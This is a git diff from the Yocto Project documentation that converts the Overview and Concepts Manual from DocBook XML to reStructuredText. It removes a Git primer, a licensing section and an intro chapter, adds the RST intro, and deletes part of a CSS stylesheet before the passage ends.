-            Here is an example:
-            <literallayout class='monospaced'>
-     $ cd ~
-     $ git clone git://git.yoctoproject.org/poky
-     $ cd poky
-     $ git fetch --tags
-     $ git checkout tags/rocko-18.0.0 -b my_rocko-18.0.0
-            </literallayout>
-            In this example, the name of the top-level directory of your
-            local Yocto Project repository is <filename>poky</filename>.
-            After moving to the <filename>poky</filename> directory, the
-            <filename>git fetch</filename> command makes all the upstream
-            tags available locally in your repository.
-            Finally, the <filename>git checkout</filename> command
-            creates and checks out a branch named "my-rocko-18.0.0" that is
-            based on the upstream branch whose "HEAD" matches the
-            commit in the repository associated with the "rocko-18.0.0" tag.
-            The files in your repository now exactly match that particular
-            Yocto Project release as it is tagged in the upstream Git
-            repository.
-            It is important to understand that when you create and
-            checkout a local working branch based on a tag, your environment
-            matches a specific point in time and not the entire development
-            branch (i.e. from the "tip" of the branch backwards).
-        </para>
-    </section>
-
-    <section id='basic-commands'>
-        <title>Basic Commands</title>
-
-        <para>
-            Git has an extensive set of commands that lets you manage changes
-            and perform collaboration over the life of a project.
-            Conveniently though, you can manage with a small set of basic
-            operations and workflows once you understand the basic
-            philosophy behind Git.
-            You do not have to be an expert in Git to be functional.
-            A good place to look for instruction on a minimal set of Git
-            commands is
-            <ulink url='http://git-scm.com/documentation'>here</ulink>.
-        </para>
-
-        <para>
-            The following list of Git commands briefly describes some basic
-            Git operations as a way to get started.
-            As with any set of commands, this list (in most cases) simply shows
-            the base command and omits the many arguments it supports.
-            See the Git documentation for complete descriptions and strategies
-            on how to use these commands:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>git init</filename>:</emphasis>
-                    Initializes an empty Git repository.
-                    You cannot use Git commands unless you have a
-                    <filename>.git</filename> repository.
-                    </para></listitem>
-                <listitem><para id='git-commands-clone'>
-                    <emphasis><filename>git clone</filename>:</emphasis>
-                    Creates a local clone of a Git repository that is on
-                    equal footing with a fellow developer’s Git repository
-                    or an upstream repository.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git add</filename>:</emphasis>
-                    Locally stages updated file contents to the index that
-                    Git uses to track changes.
-                    You must stage all files that have changed before you
-                    can commit them.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git commit</filename>:</emphasis>
-                    Creates a local "commit" that documents the changes you
-                    made.
-                    Only changes that have been staged can be committed.
-                    Commits are used for historical purposes, for determining
-                    if a maintainer of a project will allow the change,
-                    and for ultimately pushing the change from your local
-                    Git repository into the project’s upstream repository.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git status</filename>:</emphasis>
-                    Reports any modified files that possibly need to be
-                    staged and gives you a status of where you stand regarding
-                    local commits as compared to the upstream repository.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git checkout</filename> <replaceable>branch-name</replaceable>:</emphasis>
-                    Changes your local working branch and in this form
-                    assumes the local branch already exists.
-                    This command is analogous to "cd".
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git checkout –b</filename> <replaceable>working-branch</replaceable> <replaceable>upstream-branch</replaceable>:</emphasis>
-                    Creates and checks out a working branch on your local
-                    machine.
-                    The local branch tracks the upstream branch.
-                    You can use your local branch to isolate your work.
-                    It is a good idea to use local branches when adding
-                    specific features or changes.
-                    Using isolated branches facilitates easy removal of
-                    changes if they do not work out.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>git branch</filename>:</emphasis>
-                    Displays the existing local branches associated with your
-                    local repository.
-                    The branch that you have currently checked out is noted
-                    with an asterisk character.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git branch -D</filename> <replaceable>branch-name</replaceable>:</emphasis>
-                    Deletes an existing local branch.
-                    You need to be in a local branch other than the one you
-                    are deleting in order to delete
-                    <replaceable>branch-name</replaceable>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git pull --rebase</filename>:</emphasis>
-                    Retrieves information from an upstream Git repository
-                    and places it in your local Git repository.
-                    You use this command to make sure you are synchronized with
-                    the repository from which you are basing changes
-                    (.e.g. the "master" branch).
-                    The "--rebase" option ensures that any local commits you
-                    have in your branch are preserved at the top of your
-                    local branch.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git push</filename> <replaceable>repo-name</replaceable> <replaceable>local-branch</replaceable><filename>:</filename><replaceable>upstream-branch</replaceable>:</emphasis>
-                    Sends all your committed local changes to the upstream Git
-                    repository that your local repository is tracking
-                    (e.g. a contribution repository).
-                    The maintainer of the project draws from these repositories
-                    to merge changes (commits) into the appropriate branch
-                    of project's upstream repository.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git merge</filename>:</emphasis>
-                    Combines or adds changes from one
-                    local branch of your repository with another branch.
-                    When you create a local Git repository, the default branch
-                    is named "master".
-                    A typical workflow is to create a temporary branch that is
-                    based off "master" that you would use for isolated work.
-                    You would make your changes in that isolated branch,
-                    stage and commit them locally, switch to the "master"
-                    branch, and then use the <filename>git merge</filename>
-                    command to apply the changes from your isolated branch
-                    into the currently checked out branch (e.g. "master").
-                    After the merge is complete and if you are done with
-                    working in that isolated branch, you can safely delete
-                    the isolated branch.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git cherry-pick</filename> <replaceable>commits</replaceable>:</emphasis>
-                    Choose and apply specific commits from one branch
-                    into another branch.
-                    There are times when you might not be able to merge
-                    all the changes in one branch with
-                    another but need to pick out certain ones.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>gitk</filename>:</emphasis>
-                    Provides a GUI view of the branches and changes in your
-                    local Git repository.
-                    This command is a good way to graphically see where things
-                    have diverged in your local repository.
-                    <note>
-                        You need to install the <filename>gitk</filename>
-                        package on your development system to use this
-                        command.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git log</filename>:</emphasis>
-                    Reports a history of your commits to the repository.
-                    This report lists all commits regardless of whether you
-                    have pushed them upstream or not.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>git diff</filename>:</emphasis>
-                    Displays line-by-line differences between a local
-                    working file and the same file as understood by Git.
-                    This command is useful to see what you have changed
-                    in any given file.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='licensing'>
-    <title>Licensing</title>
-
-    <para>
-        Because open source projects are open to the public, they have
-        different licensing structures in place.
-        License evolution for both Open Source and Free Software has an
-        interesting history.
-        If you are interested in this history, you can find basic information
-        here:
-        <itemizedlist>
-            <listitem><para>
-                <ulink url='http://en.wikipedia.org/wiki/Open-source_license'>Open source license history</ulink>
-                </para></listitem>
-            <listitem><para>
-                <ulink url='http://en.wikipedia.org/wiki/Free_software_license'>Free software license history</ulink>
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        In general, the Yocto Project is broadly licensed under the
-        Massachusetts Institute of Technology (MIT) License.
-        MIT licensing permits the reuse of software within proprietary
-        software as long as the license is distributed with that software.
-        MIT is also compatible with the GNU General Public License (GPL).
-        Patches to the Yocto Project follow the upstream licensing scheme.
-        You can find information on the MIT license
-        <ulink url='http://www.opensource.org/licenses/mit-license.php'>here</ulink>.
-        You can find information on the GNU GPL
-        <ulink url='http://www.opensource.org/licenses/LGPL-3.0'>here</ulink>.
-    </para>
-
-    <para>
-        When you build an image using the Yocto Project, the build process
-        uses a known list of licenses to ensure compliance.
-        You can find this list in the
-        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-        at <filename>meta/files/common-licenses</filename>.
-        Once the build completes, the list of all licenses found and used
-        during that build are kept in the
-        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-        at <filename>tmp/deploy/licenses</filename>.
-    </para>
-
-    <para>
-        If a module requires a license that is not in the base list, the
-        build process generates a warning during the build.
-        These tools make it easier for a developer to be certain of the
-        licenses with which their shipped products must comply.
-        However, even with these tools it is still up to the developer to
-        resolve potential licensing issues.
-    </para>
-
-    <para>
-        The base list of licenses used by the build process is a combination
-        of the Software Package Data Exchange (SPDX) list and the Open
-        Source Initiative (OSI) projects.
-        <ulink url='http://spdx.org'>SPDX Group</ulink> is a working group of
-        the Linux Foundation that maintains a specification for a standard
-        format for communicating the components, licenses, and copyrights
-        associated with a software package.
-        <ulink url='http://opensource.org'>OSI</ulink> is a corporation
-        dedicated to the Open Source Definition and the effort for reviewing
-        and approving licenses that conform to the Open Source Definition
-        (OSD).
-    </para>
-
-    <para>
-        You can find a list of the combined SPDX and OSI licenses that the
-        Yocto Project uses in the
-        <filename>meta/files/common-licenses</filename> directory in your
-        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-    </para>
-
-    <para>
-        For information that can help you maintain compliance with various
-        open source licensing during the lifecycle of a product created using
-        the Yocto Project, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/overview-manual/overview-manual-intro.rst b/documentation/overview-manual/overview-manual-intro.rst
new file mode 100644
index 0000000000..8885eb89ff
--- /dev/null
+++ b/documentation/overview-manual/overview-manual-intro.rst
@@ -0,0 +1,74 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************************************
+The Yocto Project Overview and Concepts Manual
+**********************************************
+
+.. _overview-manual-welcome:
+
+Welcome
+=======
+
+Welcome to the Yocto Project Overview and Concepts Manual! This manual
+introduces the Yocto Project by providing concepts, software overviews,
+best-known-methods (BKMs), and any other high-level introductory
+information suitable for a new Yocto Project user.
+
+The following list describes what you can get from this manual:
+
+-  `Introducing the Yocto Project <#overview-yp>`__\ *:* This chapter
+   provides an introduction to the Yocto Project. You will learn about
+   features and challenges of the Yocto Project, the layer model,
+   components and tools, development methods, the
+   :term:`Poky` reference distribution, the
+   OpenEmbedded build system workflow, and some basic Yocto terms.
+
+-  `The Yocto Project Development
+   Environment <#overview-development-environment>`__\ *:* This chapter
+   helps you get started understanding the Yocto Project development
+   environment. You will learn about open source, development hosts,
+   Yocto Project source repositories, workflows using Git and the Yocto
+   Project, a Git primer, and information about licensing.
+
+-  :doc:`overview-manual-concepts` *:* This
+   chapter presents various concepts regarding the Yocto Project. You
+   can find conceptual information about components, development,
+   cross-toolchains, and so forth.
+
+This manual does not give you the following:
+
+-  *Step-by-step Instructions for Development Tasks:* Instructional
+   procedures reside in other manuals within the Yocto Project
+   documentation set. For example, the :doc:`../dev-manual/dev-manual`
+   provides examples on how to perform
+   various development tasks. As another example, the 
+   :doc:`../sdk-manual/sdk-manual` manual contains detailed
+   instructions on how to install an SDK, which is used to develop
+   applications for target hardware.
+
+-  *Reference Material:* This type of material resides in an appropriate
+   reference manual. For example, system variables are documented in the
+   :doc:`../ref-manual/ref-manual`. As another
+   example, the :doc:`../bsp-guide/bsp-guide` contains reference information on
+   BSPs.
+
+-  *Detailed Public Information Not Specific to the Yocto Project:* For
+   example, exhaustive information on how to use the Source Control
+   Manager Git is better covered with Internet searches and official Git
+   Documentation than through the Yocto Project documentation.
+
+.. _overview-manual-other-information:
+
+Other Information
+=================
+
+Because this manual presents information for many different topics,
+supplemental information is recommended for full comprehension. For
+additional introductory information on the Yocto Project, see the
+:yocto_home:`Yocto Project Website <>`. If you want to build an image
+with no knowledge of Yocto Project as a way of quickly testing it out,
+see the :doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document.
+For a comprehensive list of links and other documentation, see the
+":ref:`Links and Related
+Documentation <resources-links-and-related-documentation>`"
+section in the Yocto Project Reference Manual.
diff --git a/documentation/overview-manual/overview-manual-intro.xml b/documentation/overview-manual/overview-manual-intro.xml
deleted file mode 100644
index 39433aa41b..0000000000
--- a/documentation/overview-manual/overview-manual-intro.xml
+++ /dev/null
@@ -1,112 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='overview-manual-intro'>
-
-<title>The Yocto Project Overview and Concepts Manual</title>
-    <section id='overview-manual-welcome'>
-        <title>Welcome</title>
-
-        <para>
-            Welcome to the Yocto Project Overview and Concepts Manual!
-            This manual introduces the Yocto Project by providing concepts,
-            software overviews, best-known-methods (BKMs), and any other
-            high-level introductory information suitable for a new Yocto
-            Project user.
-        </para>
-
-        <para>
-            The following list describes what you can get from this manual:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><link linkend='overview-yp'>Introducing the Yocto Project</link>:</emphasis>
-                    This chapter provides an introduction to the Yocto
-                    Project.
-                    You will learn about features and challenges of the
-                    Yocto Project, the layer model, components and tools,
-                    development methods, the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#poky'>Poky</ulink>
-                    reference distribution, the OpenEmbedded build system
-                    workflow, and some basic Yocto terms.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><link linkend='overview-development-environment'>The Yocto Project Development Environment</link>:</emphasis>
-                    This chapter helps you get started understanding the
-                    Yocto Project development environment.
-                    You will learn about open source, development hosts,
-                    Yocto Project source repositories, workflows using Git
-                    and the Yocto Project, a Git primer, and information
-                    about licensing.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><link linkend='overview-manual-concepts'>Yocto Project Concepts</link>:</emphasis>
-                    This chapter presents various concepts regarding the
-                    Yocto Project.
-                    You can find conceptual information about components,
-                    development, cross-toolchains, and so forth.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            This manual does not give you the following:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Step-by-step Instructions for Development Tasks:</emphasis>
-                    Instructional procedures reside in other manuals within
-                    the Yocto Project documentation set.
-                    For example, the
-                    <ulink url='&YOCTO_DOCS_DEV_URL;'>Yocto Project Development Tasks Manual</ulink>
-                    provides examples on how to perform various development
-                    tasks.
-                    As another example, the
-                    <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                    manual contains detailed instructions on how to install an
-                    SDK, which is used to develop applications for target
-                    hardware.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Reference Material:</emphasis>
-                    This type of material resides in an appropriate reference
-                    manual.
-                    For example, system variables are documented in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;'>Yocto Project Reference Manual</ulink>.
-                    As another example, the
-                    <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>
-                    contains reference information on BSPs.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Detailed Public Information Not Specific to the
-                    Yocto Project:</emphasis>
-                    For example, exhaustive information on how to use the
-                    Source Control Manager Git is better covered with Internet
-                    searches and official Git Documentation than through the
-                    Yocto Project documentation.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='overview-manual-other-information'>
-        <title>Other Information</title>
-
-        <para>
-            Because this manual presents information for many different
-            topics, supplemental information is recommended for full
-            comprehension.
-            For additional introductory information on the Yocto Project, see
-            the <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>.
-            If you want to build an image with no knowledge of Yocto Project
-            as a way of quickly testing it out, see the
-            <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
-            document.
-            For a comprehensive list of links and other documentation, see the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#resources-links-and-related-documentation'>Links and Related Documentation</ulink>"
-            section in the Yocto Project Reference Manual.
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/overview-manual/overview-manual-style.css b/documentation/overview-manual/overview-manual-style.css
deleted file mode 100644
index 97a364b125..0000000000
--- a/documentation/overview-manual/overview-manual-style.css
+++ /dev/null
@@ -1,988 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/overview-manual-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-.writernotes {
-  color: red;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
